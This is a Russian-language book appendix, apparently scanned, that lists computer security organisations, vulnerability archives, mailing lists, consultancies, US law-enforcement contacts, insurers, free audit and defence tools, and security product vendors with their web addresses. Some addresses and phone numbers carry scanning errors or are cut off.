В этом приложении содержится информация об организациях и ресурсах, связанных с обеспечением безопасности, базах данных об уязвимых местах, о псевдонимах почтовой рассылки, получении правовой поддержки, бесплатных продуктах и поставщиках средств защиты. Поддерживать защиту сетей нелегко - вы должны знать, с какими людьми сотруд­ ничать и какие продукты покупать.

Организации, связанные с обеспечением безопасности American Society for Industrial Security (ASIS) Американское общество по промышленной безопасности является профессиональной организацией для менеджеров, работающих в области безопасности. Она издает ежеме­ сячный журнал, посвященный вопросам безопасности и управлению в страховых случа­ ях. AS1S также является спонсором совещаний по вопросам безопасности и другой дея­ тельности.

CERT Группа реагирования на чрезвычайные ситуации (Computer Emergency Response Team) содействует получению знаний в области безопасности, обеспечивает круглосуточную техническую помощь при инцидентах, связанных с безопасностью компьютеров и сетей, и предлагает обучение по вопросам безопасности и другие услуги в данной области.

CERT размещается в Software Engineering Institute, Carnegie Mellon University (CMU), в г. Питтсбург, шт. Пенсильвания (Pittsburgh, PA).

Телефон круглосуточной горячей линии: 412-268-7090.

www.cert.org CERIAS CERIAS (произносится как слово «serious ») - это Центр по обучению и исследованиям в области обеспечения безопасности и защиты информации (Center for Education and Re­ search in Information Assurance and Security) при Purdue University. Спонсорская программа обеспечивает ранний доступ к технологиям и содействует участию в решении проблем и установлению связей с исследователями в данной отрасли.

www.cerias.org 1. «Сириэс». -Примеч. пер.

Люди и продукты, о которых следует знать CIAC Наблюдательный отдел по компьютерным инцидентам Министерства энергетики США (Computer Incident Advisory Capability - CIAC) размещается в Национальной лаборатории имени Лоуренса Ливермора (Lawrence Livermore National Laboratory). Он обеспечивает компьютерную безопасность МЭ и делится советами и инструментами в области безопас­ ности с Интернет-сообществом.

www.ciac.org/ciac Computer Security Institute fCSIJ Институт компьютерной безопасности является спонсором семинаров и конференций по вопросам безопасности. Он также выпускает ежемесячный информационный бюлле­ тень и ежеквартальный журнал с результатами исследований по компьютерной безопас­ ности.

www.gocsi.com EFF «Фонд электронного фронтира» (Electronic Frontier Foundation - EFF) является неком­ мерческой организацией, заботящейся о тайне личной информации, свободе ее выраже­ ния и доступности.

www.eff.org FIRST FIRST является коалицией, объединяющей различные группы реагирования на ком­ пьютерные инциденты (Computer Security Incident Response Team - CSIRT) по всему миру.

Большинство из этих организаций оказывают круглосуточную помощь по телефону без вы­ ходных дней. Если у вас произошел взлом или возникла проблема, связанная с безопасно­ стью, то вы можете обратиться за помощью в одну из таких организаций. Членами FIRST яв­ ляются все наиболее опытные группы, включая CERT, CIAC (Министерство энергетики США), AUS-CERT (Австралия) и DFN/CERT (Германия). Для получения текущего списка групп-участников FIRST введите адрес домашней страницы FIRST в ваш браузер.

www.first.org.

High Technology Crimes Investigation Association (HTCIA) Ассоциация по расследованию преступлений в области высоких технологий объединяет лиц, занимающихся расследованием и рассмотрением в суде преступлений в данной об­ ласти. В Соединенных Штатах имеются несколько отделений этой организации.

www.htcia.org ICSA Предоставляет услуги по обеспечению безопасности, сертификации, обучению и участию в организации. Также обеспечивает обмен информацией с разработчиками продуктов и провайдерами услуг. Полный список услуг можно увидеть на веб-сайте ICSA.

www.icsa.com 2. Forum of Incident and Response Security Team. - Примеч. nep.

3. International Computer Safety Association - Международная ассоциация безопасности вычислительных систем. Примеч. пер.

Люди и продукты, о которых следует знать ISC2 (International Information Systems Security Certification Consortium) Международный консорциум по сертификации безопасности информационных систем является глобальной некоммерческой организацией, обобщающей знания в области ин­ формационной безопасности. Он также проводит сертификацию профессионалов в во­ просах безопасности по международным стандартам.

www.isc2.org Internet Society «Общество Internet» является международной организацией, поддерживающей глобаль­ ное сотрудничество и координацию технологий и приложений Интернета. Информацию об этом обществе можно найти на веб-сайте www.isoc.org Information Systems Security Association (ISSA) Ассоциация защиты информационных систем является международной организацией.

Она осуществляет обучение, публикацию и другую деятельность, связанную с безопасно­ стью.

www.issa.org 1T-ISAC (Information Technology—Information Sharing and Analysis Center) Центр информационных технологий, обмена информацией и ее анализа является фору­ мом по обмену информацией, связанной с угрозами и способами защиты от этих угроз.

www.it-isac.org US National Infrastructure Protection Center Центр зашиты национальной инфраструктуры США является правительственным орга­ ном, ответственным за оценку угроз, предупреждение, расследование и реагирование на угрозы или атаки против критических инфраструктур страны, таких, как телекоммуника­ ции, службы спасения, энергетика, банковские и финансовые системы.

www.nipc.gov SANS Institute SANS является объединенной образовательной и исследовательской организацией. SANS предлагает проведение технических конференций для системных администраторов и ад­ министраторов средств обеспечения безопасности. Он делится знаниями, накопленными в данной области, делая основной упор на то, как решать некоторые из проблем, с которы­ ми сталкиваются системные администраторы. Информационный бюллетень Network Se­ curity Digest, который выпускает организация SANS, является самым читаемым изданием среди системных администраторов и администраторов средств безопасности. Детали можно посмотреть на веб-сайте SANS.

www.sans.org 4. Институт системного администрирования, сетевых технологий и зашиты сетей. - Примеч. пер.

Люди и продукты, о которых следует знать т SEARCH Национальный консорциум по юридической информации и статистике (National Consor­ tium for Justice Information and Statistics) обеспечивает обучение компьютерному праву представителей правоохранительных органов и корпораций. См. веб-сайт SEARCH для более подробной информации об учебных мероприятиях.

www.search.org US Office of Homeland Security Управление внутренней безопасности США координирует национальную стратегию по усилению защиты от террористических угроз и атак в стране.

www.whitehouse.gov/homeland/ USENIX/SAGE USENIX является некоммерческой образовательной организацией по UNIX и UNIX-по­ добным системам. Она выпускает журнал и информационный бюллетень, а также являет­ ся спонсором различных конференций и семинаров по безопасности UNIX-систем и сис­ темному администрированию.

www.usenix.org Ресурсы по обеспечению безопасности Site Security Handbook Он является ценным источником знаний по вопросам безопасности. В нем содержится отличный обзор мер, необходимых для защиты сайта, подключаемого к Интернету. Этот документ не следует пропускать.

ftp://ds.internic.net/rfc/rfcl244.txt Info Security News Это профессиональный журнал по вопросам безопасности, который стоит читать.

www.infosecnews.com Архивы со сведениями об уязвимых местах CVE www.cve.mitre.org Security Focus www.securityfocus.com Shake Communications www.shake.net Популярные почтовые списки рассылки 5. Common Vulnerabilities and Exposures - распространенные уязвимые места и потенциальные убытки. - Примеч. тр.

Люди и продукты, о которых следует знать Bugtraq В этом списке обсуждаются уязвимые места UNIX, как их можно использовать и как их закрыть. Его целью является не обучение взлому систем, но, напротив, тому, как обнару­ живать уязвимые места, как делиться информацией о них, как их закрывать и уменьшать риск повреждения систем и сетей. Для подписки отправляйтесь по адресу www.Security- Focus.com.

NT Bugtraq s В этом списке обсуждаются уязвимые места NT7.

www.securityfocus.com Firewalls В этом списке обсуждаются различные типы брандмауэров (он размещен на хосте Great Circle Association). Для подписки укажите "subscribe firewalls" внутри вашего запроса по адресу majordomo@greatcircle.com.

Консультационные фирмы Если вы решите, что вам нужна помощь в осуществлении ваших планов, то сделаете пра­ вильно, если обратитесь к профессионалу. Консультационные услуги в области безопас­ ности оказывают следующие фирмы:

@Stake www.@stake.com Data Systems Analysts www.dsainc.com Deloitte Touche & Tohmatsu www.deloitte.com Ernst & Young LLP www.ey.com FishNet Consulting, Inc.

www.fishnetsecurity.com Guardent www.guardent.com 6. NT Bugtraq находится по адресу ntbuglraq.com, а по приведенному ниже адресу находится просто Bugtraq, Примеч. пер, 7. Автор имеет в виду операционные системы Windows NT, Windows 2000 и Windows XP. - Примеч. пер.

166 Люди и продукты, о которых следует знать Kroll www.krolIworldwide.com Network Defense networkdefense.com Predictive Systems www.predictive.com PriceWaterhouseCoopers www.pw.com SAIC (Science Applications International Corporation) www.saic.com Security www.securify.com Расследование компьютерных преступлений Большинство групп реагирования на вторжение не проводят расследований. Они только предоставляют помощь, информацию и ведут поиск причин. Если вы стали жертвой ком­ пьютерного преступления, то вам, может быть, будет необходимо сообщить об этом пре­ ступлении в один из перечисленных ниже правительственных органов. Узнайте, когда и как прибегать к помощи правоохранительных органов.

Министерство юстиции США (Department of Justice - DOJ) Criminal Division (Управление по уголовным делам) General Litigation and Legal Advice Section (Отдел общего судопроизводства и юридиче­ ских консультаций) Computer Crime Unit (Отдел компьютерных преступлений) Department of Justice Washington, DC www.usdoj.gov 202-514- Федеральное бюро расследований - ФБР (Federal Bureau of Investigation - FBI) National Computer Crimes Squad (Национальная группа по компьютерным преступлениям) Federal Bureau of Investigation 7799 Leesburg Pike South Tower, Suite 8. Международная корпорация научных приложений - инжиниринговая организация. - Примеч. пер.

Люди и продукты, о которых следует знать Falls Church, VA www.fbi.gov 202-324- Секретная служба США (U.S. Secret Service) Financial Crimes Division (Управление финансовых преступлений) Electronic Crime Branch (Отделение электронных преступлений) U.S. Secret Service Washington, DC www.ustreas.gv/usss/ 202-435- Страхование информационных технологий Хотите застраховать ваш брандмауэр или веб-сервер? Такой вид страхования предостав­ ляют следующие компании.

Cigna Insurance Предлагает страховку «Безопасные системы» (Secure System Insurance). Обеспечивает ин­ тегрированное решение по управлению рисками, помогающее защитить системы и ин­ формационные фонды. За деталями и требованиями обратитесь на веб-сайт компании Ci­ gna.

www.cigna.com Lloyd's Lloyd's предлагает страхование от воздействия возможных атак на застрахованную ком­ пьютерную систему. Для получения дальнейшей информации зайдите на их веб-сайт или свяжитесь с ними.

www.lIoyds.com Программы, о которых вам нужно знать Как я упоминала на протяжении всей книги, существует множество пакетов программ, касающихся обеспечения безопасности. В этом разделе перечислены различные бесплат­ ные продукты для обеспечения защиты, которые должны быть известны каждому, кто за­ нимается вопросами безопасности.

Бесплатные программы COPS Система The Computer Oracle and Password System (COPS) является программой, обес­ печивающей защиту и определение рисков в UNIX-системах. Она проверяет наличие пус­ тых паролей в файлах /etc/passwd, наличие файлов, открытых для записи всему миру, ftp сайтов с неправильной конфигурацией и т. д. Для получения копии программы, зайдите на анонимный ftp-сайт.

ftp.cert.org Люди и продуты, о которых следует знать Cgichk Инструмент для определения уязвимых мест в Сети. Он проводит поиск последователь­ ности пересекающихся каталогов и файлов конкретного сайта.

www.sourceforge.net/projects/cgichk Coroner's Toolkit Программы для проведения расследования состояния компьютерной UNIX-системы по­ сле катастрофического взлома.

www.porcupine.org/forensics/ Crack Используйте Crack, написанный Алеком Маффеттом (Alec Muffett), для тестирования пло­ хих паролей. (Но не запускайте Crack в системах, за поддержку которых вы не отвечаете.

Иначе вы можете оказаться без работы!) Копию программы можно получить на анонимном ftp-сайте.

info.cert.org/pub/tools/crack Dsniff Набор инструментов для аудита сетей и тестов на проникновение.

monkey.org/~dugsong/dsniff Firewalk Firewalk анализирует реакции IP-пакетов для обнаружения фильтров списка управления доступом (ACL) шлюза.

www.es2.net/research/firewaik GNUPG Полностью заменяет шифрование по алгоритму PGP. В нем не используется патентован­ ный алгоритм IDEA, и его можно использовать без всяких ограничений.

www.gnupg.org Hping Это ориентированный на работу с командной строкой сборщик/анализатор пакетов TCP/IP.

www.hping.org IP Filter IP-Filter является фильтром TCP/IР-пакетов, coombs.anu.edu.au/ipfilter Klaxon & Tocson Инструменты для обнаружения вторжения, определяющие необычную активность (например, udp, tcp). Klaxon чрезвычайно полезен для определения атак с использованием сканеров портов ISS и SATAN. Tocson будет полезным при обнаружении попыток зон­ дирования с применением TCP SYN.

www.eng.aubura.edu/users/doug/second.htm!

Люди и продукты, о которых следует знать LOphtCrack LOphtCrack является инструментом аудита паролей. Его новая версия имеет более высокое быстродействие и лучшую систему отчетов. Например, в его отчете сообщается о количе­ стве и процентном отношении взломанных паролей.

www.@stake.com/research/lc Lsof Lsof показывает все открытые файлы в UNIX-системе. Его копию можно получить на ано­ нимном ftp-сайте.

vic.cc.purdue.edu Nessus Проект Nessus задуман для обеспечения Интернет-сообщества бесплатными инструмен­ тами аудита безопасности. На этом сайте можно получить доступ к различным проектам и программам.

www.nessus.org NPASSWD Этот инструмент для смены паролей проводит проверку наличия плохих паролей в диало­ говом режиме и выдает отказ на их применение. Копию вы можете получить на аноним­ ном ftp-сайте.

ftp.cc.utexas.edu/pub/npasswd OpenSSH Бесплатная версия протокола SSH9.

www.openssh.com/ OPIE Этот бесплатный набор инструментов с возможностью повторного распространения под­ ходит для большинства UNIX-систем и заменяет программу login и демон FTP версиями, которые используют ОТРп для идентификации пользователя.

www.inner.net/opie/ SATAN (System Administrator's Tool for Analyzing Networks) Инструмент системного администратора для анализа сетей, написанный Витсе Венема (Wietse Venema) и Дэном Фармером (Dan Farmer), позволяет проводить зондирование сис­ тем из сети таким способом, который, возможно, применит хакер. Его можно использо­ вать для тестирования защиты как одной, так и нескольких систем сети. Копию можно по­ лучить на анонимном ftp-сайте.

www.porcupine.org/pub/security/index.html 9. Secure Shell - Интернет-протокол для безопасного удаленного доступа с применением шифрования. - Примеч. пер, 10. One-time Passwords In Everything. - Примеч. пер, 11. One-Time Programmable - технология однократно программируемых микроконтроллеров. - Примеч. пер.

170 Люди и продукты, о которых следует знать SNORT Система обнаружения вторжения в сеть с открытым исходным кодом (Open Source Net­ work Intrusion Detection System).

www.snort.org Socks Пакет позволяет использовать различные Интернет-службы (такие, как gopher, ftp и telnet) через брандмауэр. Для получения копии нужно выйти на анонимный ftp-сайт.

www.socks.nec.com/ Solaris Security Toolkit Набор инструментов защиты Solaris.

www.sun.com/security/jass Swatch Пакет Swatch позволяет контролировать и фильтровать регистрационные файлы, а также выполнять конкретные действия, основанные на конкретном шаблоне (log pattern). Копию можно получить на анонимном ftp-сайте.

oit.ucsb.edu/~eta/swatch/ TCP Wrapper Этот пакет позволяет администратору UNIX-системы управлять доступом к различным сетевым службам при помощи списка управления доступом (access control list). Он также обеспечивает регистрационную информацию о свернутых сетевых службах (wrapped net­ work services) и может быть использован для предотвращения атак на сеть и наблюдения за ними.

Копию можно получить на анонимном ftp-сайте.

ftp://ftp.porcupine.org/pub/security/index.html TIS FirewallToolkit Этот пакет программ может применяться для создания и поддержки системы защиты сети от нежелательной сетевой деятельности. Его можно найти на анонимном ftp-сайте.

www.fwtk.org Tiaer Tiger позволяет выявить известные уязвимые места в рабочих станциях UNIX. Он похож на COPS, но имеет больший набор функций. Копию можно получить на анонимном ftp сайте.

www.net.tamu.edu/ftp/security/TAMU Titan Titan является коллекцией программ для настройки или укрепления безопасной конфи­ гурации при установке UNIX-системы.

www.fish.com/titan Люди и продукты, о которых следует знать Tripwire Tripwire отслеживает изменения в системных двоичных файлах. Он доступен на аноним­ ном ftp-сайте.

www.tripwire.com/ TTY-Watcher TTY-Watcher проводит слежение, регистрацию и взаимодействие со всеми телетайпами (TTY). Для получения копии зайдите на анонимный ftp-сайт.

ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ttywatcher/ OPIE Современный обратно совместимый S/Key.

inner.net/opie/ Поставщики продуктов Ниже перечисленные поставщики являются надежными компаниями, у которых вам сле­ дует приобретать продукты, обеспечивающие безопасность. Некоторые из этих компаний предлагают свои услуги по проведению консультаций и обучения:

Absolute Software Corporation www.absoIute.com Консультационные услуги Системы мониторинга и слежения AccessData Corp www.accessdata.com Восстановление паролей Продукты по управлению паролями ActivCard, Inc.

www.activcard.com Пароли и генерирование паролей Смарт-карты и электронные жетоны Защита веб-серверов Aladdin Knowledge Systems, Inc.

www.ealaddin.com Управление доступом !2. Secret Key - секретный ключ, - Примеч. пер.

Люди И продукты, о которых следует знать Alternative Computer Technology, Inc.

www.altcomp.com Биометрические системы Шифрование файлов Брандмауэры Защита от вирусов и их обнаружение ArcSight www.arcsight.com Управление безопасностью предприятия Взаимосвязи, расследование и отчетность Argus Systems Group, Inc.

www.argus-systems.com Управление доступом Электронная коммерция Управление политиками Брандмауэры Безопасность в Интернете Astaro Corporation www.astaro.com Устройства защиты для работы в Интернете Authenex www.authenex.com Система аутентификации Authentify www.authentify.com Решения для идентификации в Интернете AventailCorp.

www.aventail.com Программы обеспечения доступа к данным Частная виртуальная сеть 13. Solutions - готовые решения или проекты. Здесь далее при переводе использована сокращенная форма термина. - Примеч. пер.

14. Virtual Private Network (VPN). - Примеч. пер.

Люди и продукты, о которых следует знать Baltimore Technologies www.baltimore.com Безопасность приложений Цифровые подписи и органы сертификации Электронная коммерция Электронная почта Защита веб-серверов Bigfix www.bigfix.com Управление установкой патчей Bindview Development www.bindview.com Обнаружение вторжения и незаконного использования Безопасные операционные системы Biometric Access Corp www.biometricaccess.com Аутентификация пользователей и терминалов Системы персональной идентификации - биометрические системы Bioscryptlnc www.bioscrypt.com Аутентификация Системы персональной идентификации - биометрические системы BLOCKADE Systems Corp www.blockade.com Программы управления доступом к данным Брандмауэры Фильтрация и мониторинг Интернета Сетевой мониторинг Пароли и генерирование паролей Защита веб-серверов BLUELANCE ' www.bluelance.com Обнаружение вторжения и незаконного использования Сетевой мониторинг Анализ рисков Люди и продукты, о которых следует знать BorderWare Technologies Inc.

www.borderware.com Брандмауэры Безопасность операционных систем Безопасный удаленный доступ BRICKSetver™ www.thirdpig.com Устройство для безопасной работы в Интернете The Buddy System ® www.buddysystem.net Анализ и управление рисками Camelot www.cameIot.com Доступ к данным Политики и процедуры Защитные программы Captus Networks www.captusnetworks.com Брандмауэры Обнаружение вторжения и незаконного использования Сетевой мониторинг Certco www.certco.com Цифровые подписи и органы сертификации Электронная коммерция Cert/com Corp www.certicom.com Приложения Органы сертификации Продукты для разработки систем криптографии Защита факсимильных систем Checkpoint www.checkpoint.com Брандмауэры Политики и процедуры Управление частными виртуальными сетями Люди и продукты, о которых следует знать Chrysalis-ITS www.chrysalis-its.com Цифровые подписи и органы сертификации Смарт-карты и электронные жетоны Частные виртуальные сети Cisco Systems, Inc.

www.cisco.com Консультационные услуги Брандмауэры Обнаружение вторжения и незаконного использования Citadel Computer Systems www.citadel.com Управление доступом Управление безопасностью Шифрование файлов CMS Technologies www.cmstech.com Охрана имущества Электронная сигнализация Обнаружение вторжения и незаконного использования Codex Data Systems www.codexdatasystems.com Обнаружение вторжения и незаконного использования Системы слежения Сетевой мониторинг Cogentric www.cogentric.com Политики и процедуры Анализ рисков Оценка эффективности защиты Communication Devices, Inc.

www.commdevices.com Консультационные услуги Устройства защиты/фильтрации (protection/screening) портов Защитные модемы Смарт-карты и электронные жетоны 176 Люди и продукты, о которых следует знать Computer Associates www.ca.com Консультационные услуги Управление безопасностью предприятия Computer Sentry Software www.sentryinc.com Уведомление о краже переносного компьютера Computer Sciences Corporation www.csc.com Консультационные услуги по вопросам безопасности Учебные инструменты и материалы Цифровые подписи и органы сертификации Анализ рисков Computer COP Corp www.computercop.com Обучение и тренинг Фильтрация и мониторинг Интернета Другие брандмауэры и средства защиты в Интернете Другие средства обнаружения вторжения Генераторы PIN-кодов Инструменты сканирования/тестирования Computer Security Products, Inc.

www.computersecurity.com Кабели Программы управления доступом Электронная сигнализация Системы идентифицирующих меток Системы слежения Conclusive www.conclusive.com Приложения Доступ к данным Обнаружение вторжения/незаконного использования Защита веб-сервера Люди и продукты, о которых следует знать CONSUL risk www.consul.com Аудит и управление рисками Counterpane Internet Security, Inc.

www.counterpane.com Электронная коммерция Обнаружение вторжения/незаконного использования Сетевой мониторинг Granite Systems www.cranite.com Безопасность беспроводных локальных сетей CRYPTOCard www.cryptocard.com Системы паролей и генерирования паролей Генераторы PIN-кодов Единая регистрация Смарт-карты и электронные жетоны Защита веб-сервера CyberGuard Corporation www.cyberguard.com Брандмауэры Защищенная операционная система Cyber-Ark Software www.cyber-ark.com Решения по защите предприятий Cyber Safe Corporation www.cybersafe.com Консультационные услуги Программы управления доступом Политики и процедуры Единая регистрация Смарт-карты и электронные жетоны Защита веб-сервера 15. LAN - local area network. - Примеч. пер 16. Single sign-on - регистрация во всей сети путем однократного ввода пароля. - Примеч. пер 178 Люди и продукты, о которых следует знать Cyher-SIGN www.cybersign.com Аутентичные цифровые подписи Безопасная верификация пользователя CyberSoft, Inc.

www.cyber.com Обнаружение вторжения/незаконного использования Защита от вирусов и их обнаружение Су/ink www.cylink.com Цифровые подписи и органы сертификации Политики и процедуры Смарт-карты и электронные жетоны Datacard Corp www.datacard.com Решения по идентификации DataKey, Inc.

www.datakey.com Цифровые подписи и органы сертификации Смарт-карты и электронные жетоны OataLynx, Inc.

www.dlxguard.com Приложения Электронная коммерция Брандмауэры Обнаружение вторжения/незаконного использования Пароли и генерирование паролей Политики и процедуры Защита вебсервера Digital Delivery Inc.

www.digitaldelivcry.com Шифрование информации Защищенное распространение информации Люди и продукты, о которых следует знать DIVERSINET Corp.

www.dvnet.com Электронная почта Электронная коммерция Защищенные беспроводные телекоммуникации ENSURE Technologies www.ensuretech.com Обнаружение вторжения, незаконного использования Entrust Technologies www.entrust.com Цифровые подписи и органы сертификации Электронная почта EyeDentify, inc.

www.eyedentify.com Системы персональной идентификации - биометрические системы eEye Digital Security www.eeye.com Безопасность телекоммуникаций и сетей Обзор вопросов информационной безопасности Сетевой мониторинг Анализ рисков Инструменты сканирования/тестирования Программы обеспечения безопасности Защита веб-сервера Entegrity Solutions www.entegrity.com Доступ к данным Единая регистрация Защита веб-сервера Entercept Security Technologies www.entercept.com Обнаружение вторжения/незаконного использования Защищенные операционные системы Защита веб-сервера 180 Люди и продукты, о которых следует знать eSecurity, Inc.

www.esecurityinc.com Сетевой мониторинг eSecurityOnline LLC www.esecurityonline.com Политики и процедуры Анализ рисков Инструменты сканирования/тестирования FinJan www.linjan.com Брандмауэры Инструменты фильтрации и мониторинга Интернета Foundstone www.foundstone.com Безопасность телекоммуникаций и сетей Обзор вопросов информационной безопасности Обнаружение вторжения/незаконного использования Инструменты сканирования/тестирования Защита от вирусов и их обнаружение Forescout www.forescout.com Защита периметра и блокирование атак F-Secure Inc.

www.fsecure.com Решения по защите мобильных систем Funk Software, Inc.

www.funk.com Удаленный доступ Аутентификация Gemplus Corp www.gemplus.com Приложения Смарт-карты Люди и продукты, о которых следует знать Gemini Computers, Inc.

www.geminisecure.com Аутентификация пользователей и терминалов Консультационные услуги Цифровые подписи и органы сертификации Электронная коммерция Брандмауэры Защищенные операционные системы Зашита веб-сервера Gilian Technologies Inc.

www.gilian.com Защита веб-контента. Global Technology Associates, Inc.

www.gta.com Брандмауэры Global Technologies Group, Inc.

www.gtgi.com Защита от кражи, подделок и физического проникновения Приложения Защита CD-ROM Брандмауэры Системы идентификации Great Circle Associates www.greatcircle.com Консультационные услуги Брандмауэры Семинары и практические совещания Guidance Software www.encase.com Решения для проведения расследований и анализа данных после вторжения CyberSafe www.cybersafe.com Решение проблем безопасности по контракту 182 Люди и продукты, о которых следует знать Harris Corporation www.harris.com Обнаружение вторжения/незаконного использования Сетевой мониторинг Hewlett-Packard Corporation www.hp.com Приложения Электронная коммерция Брандмауэры Защита веб-серверов Hifn www.hifn.com Шифрующие процессоры IBM www.ibm.com Консультационные услуги Электронная коммерция Брандмауэры Цифровые подписи и органы сертификации Обнаружение вторжения/незаконного использования Политики и процедуры Защищенная электронная почта Info Express, Inc.

www.infoexpress.com Персональный брандмауэр Удаленный доступ Integra/is www.integralis.com Брандмауэры Управление брандмауэрами Инструменты фильтрации и мониторинга Интернета Intel Corporation www.intel.com Защита от вирусов и их обнаружение Защита веб-серверов Люди и продукты, о которых следует знать Inte/atactics, com www.mteIlitactics.cQm Управление безопасностью предприятия intrusion Inc.

www.intrusion.com Обнаружение вторжения/незаконного использования Сетевой мониторинг IntruVert www.intruvert.com - •. • Быстродействующие системы обнаружения вторжения Investigative Group international www.igint.coni Консультационные услуги Инструменты анализа данных после вторжения ISS www.iss.net Обнаружение вторжения/незаконного использования Сетевой аудит Инструменты сканирования/тестирования Управление безопасностью Обучение Защита веб-серверов Kyberpass Corporation www.kyberpass.com Аутентификация Цифровые подписи и органы сертификации Lancope www.lanscope.com Устройства обнаружения вторжения UKSoftware www.ljk.com Защищенная единая регистрация Люди и продукты, о которых следует знать Lucent Technologies www.lucent.com/security Управление доступом Управление сетями Lumeta Corporation www.lumeta.com Инструменты визуального представления сетевой топологии MessageLabs wvvw.messagelabs.com Защита электронной почты McAfee www.mcafee.com Обнаружение вирусов и незаконного использования nCipher Corporation Ltd.

www.ncipher.com Криптографические продукты nCircle www.ncircle.com Управление безопасностью Обнаружение вторжения Решения по открытому управлению NetScreen www.netscreen.com Интегрированные устройства защиты Netegrity, Inc.

www.netegrity.com Управление доступом Электронная коммерция netforensics www.netforensics.com Фильтрация и мониторинг Интернета Обнаружение вторжения/незаконного использования Люди и продукты, о которых следует знать Сетевой мониторинг NetScreen Technologies, Inc.

www.netscreen.com Брандмауэры Фильтрация и мониторинг Интернета Частная виртуальная сеть Network-1 Security Solutions, Inc.

www.network-l.com Брандмауэры Фильтрация и мониторинг Интернета Обнаружение вторжения/незаконного использования Network Associates www.nai.com Управление доступом Консультационные услуги Продукты для шифрования Обнаружение вторжения/незаконного использования Управление сетями Сетевой мониторинг Защищенная электронная почта Защита от вирусов Защищенный веб-сервер Network Engineering Software, Inc.

www.fireants.com Брандмауэры NFR Security www.nfr.com Обнаружение вторжения/незаконного использования Правовое обеспечение сети Политики и процедуры netForensics www.netforensics.com Решения по управлению безопасностью информации Люди и продукты, о которых следует знать Net/0 Corporation—WebTrends Corp.

www.netiqwebtrends.com Сетевой мониторинг Работа с уязвимыми местами Защита веб-серверов NIKSUNInc.

www.nicksun.com Фильтрация и мониторинг Интернета Сетевой мониторинг Nokia internet Communications www.nokia.com Брандмауэры Фильтрация и мониторинг Интернета Сетевой мониторинг OmniSecure www.omnisccure.com Решения по шифрованию банка данных OneSecure www.onesecure.com Брандмауэры Обнаружение вторжения/незаконного использования Частная виртуальная сеть Palisade Systems www.paiisadesys.com Устройства защиты сетей PassLogix www.passlogix.com Пароли и генерирование паролей Pelican Security www.pelicansecurity.com Фильтрация и мониторинг Интернета Другие брандмауэры и средства защиты в Интернете Защита от вирусов и их обнаружение Люди и продукты, о которых следует знать PentaSafe Security Technologies, Inc.

www.pentasafe.com Управление доступом к данным Обнаружение вторжения/незаконного использования Сетевой мониторинг Политики и процедуры Инструменты сканирования и тестирования Защита веб-серверов Phaos Technology Corporation www.phaos.com Продукты для шифрования Электронная коммерция PostX Corporation www.postx.com Защищенная электронная почта Predictive Systems, Inc.

www.predictive.com Консультационные услуги по вопросам безопасности Защита телекоммуникаций и сетей Восстановительные работы Брандмауэры Обнаружение вторжения/незаконного использования Сетевой мониторинг Promptus www.promptus.com Продукты для проведения шифрования Protegrity www.protegrity.com Управление доступом Продукты для шифрования Управление политиками Psionic Technologies www.psionic.com Программы верификации вторжения и борьбы с ним 188 Люди и продукты, о которых следует знать Quatys, Inc.

www.qualys.com Обнаружение вторжения/незаконного использования Сетевой мониторинг Инструменты сканирования и тестирования Rainbow Technologies www.rainbow.com Аутентификация пользователей и терминалов Смарт-карты и электронные жетоны Защита программных копий Частная виртуальная сеть Recognition Systems Inc.

www.handrcader.com Аутентификация пользователей и терминалов Системы персональной идентификации - биометрические системы Recourse Technologies (приобретена Symantec) www.recourse.com Обнаружение вторжения/незаконного использования Сетевой мониторинг Управление угрозами Технология HoneyPot Riptech (приобретена Symantec) www.riptech.com Службы защиты в реальном масштабе времени RiskWatch www.riskwatch.com Программы оценки рисков RockSoft www.rocksoft.com Целостность данных RSA Data Security www.rsasecurity.com Приложения Цифровые подписи и органы сертификации Электронная коммерция Защищенная электронная почта Продукты для проведения шифрования Люди и продукты, о которых следует знать S4 Software, Inc.

www.dli-security.com Централизованное управление учетными записями Управление доступом Safetynet Security www.safetynet.com Обнаружение вирусов и незаконного использования SAIC www.saic.com Консультационные услуги Приложения обеспечения защиты SAINT Corporation www.saintcorporation.com Набор инструментов для обнаружения уязвимых мест в сети Sandstorm Enterprises, Inc.

www.sandstorm.net Обнаружение вторжения/незаконного использования Сетевой мониторинг Другие виды телекоммуникаций Sawydata www.sawydata.com Аудит нарушений политик Schlumberger www.schlumberger.com Защищенные виды беспроводной связи Смарт-карты Secure Computing www.securecomputing.com Управление доступом Брандмауэры Инструменты фильтрации и мониторинга Интернета Защита удаленного доступа Защита сети Люди и продукты, о которых следует знать SecureLogix Corporation www.securelogix.com Защита телекоммуникаций SecureNet Technologies www.securenet.org Защита от вирусов и их обнаружение Sen/Gate www.servgate.com Устройства защиты в Интернете SecureWorks www.secureworks.com Обнаружение вторжения/незаконного использования Сетевой мониторинг Security, Inc.

www.securify.com Консультационные услуги Цифровые подписи и органы сертификации Сетевой мониторинг Смарт-карты SecurityFocus (приобретен Symantec) www.securityfocus.com Обучение и тренировки Интерактивное обучение Сетевой мониторинг Службы уведомления Другие средства обнаружения вторжения Управление уязвимыми местами Sequel Technology Corp.

www.sequeltech.com Фильтрация и мониторинг Интернета SiIanis Technology www.silanis.com Аутентификация Защищенные электронные подписи Люди и продукты, о которых следует знать SilentRunnerInc.

www.silentrunner.com Продукты для анализа защиты сети Silicon Defense www.silicondefense.com Продукты для обнаружения вторжения в сеть SonicWALL www.sonicwall.com Устройства для защиты в Интернете SourceFire www.sourcefire.com Продукты для обнаружения вторжения в сеть SPI Dynamics www.spidynamics.com Продукты для оценки безопасности веб-приложений Stonesoft www.stonesoft.com Брандмауэры и частные виртуальные сети Решения по кластерингу (clustering) с высокой доступностью Stratum8 Networks www.stratum8.com Защита приложений в реальном масштабе времени SurfControl www.surfcontrol.com Фильтрация и мониторинг Интернета Сетевой мониторинг Spyrus, Inc.

